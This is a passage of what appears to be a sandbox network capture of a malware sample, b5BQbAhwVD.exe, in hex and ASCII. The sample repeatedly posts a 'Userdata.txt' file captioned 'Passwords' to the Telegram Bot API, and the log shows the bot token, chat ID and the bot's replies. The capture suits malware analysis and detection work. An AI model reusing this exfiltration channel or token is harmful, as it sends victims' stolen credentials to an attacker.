2025-01-10 21:43:56 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 33 35 64 64 32 32 37 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32735dd22759Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:56 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:56 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:43:56 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43632,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545436,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	50011	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:58 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32864a6a8abc Host: api.telegram.org Content-Length: 1090
2025-01-10 21:43:58 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 36 34 61 36 61 38 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32864a6a8abcContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:58 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:43:58 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43633,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545438,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	50013	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:59 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd329a828fcc76 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:43:59 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 61 38 32 38 66 63 63 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd329a828fcc76Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:00 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:00 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:00 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43634,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545440,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	50015	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:01 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32aeab857d1a Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:01 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 61 65 61 62 38 35 37 64 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32aeab857d1aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:01 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:01 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:01 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43635,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545441,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	50017	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:03 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32c16ebc6854 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:03 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 31 36 65 62 63 36 38 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32c16ebc6854Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:03 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:03 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:03 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43636,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545443,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	50019	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:04 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32d57a7f140f Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:04 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 35 37 61 37 66 31 34 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32d57a7f140fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:05 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:05 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:05 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43637,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545445,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	50021	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:06 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32e8229d8d62 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:06 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 38 32 32 39 64 38 64 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32e8229d8d62Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:06 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:06 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:06 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43638,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545446,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	50025	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:08 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32fabd7561cb Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:08 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 61 62 64 37 35 36 31 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32fabd7561cbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:08 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:08 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
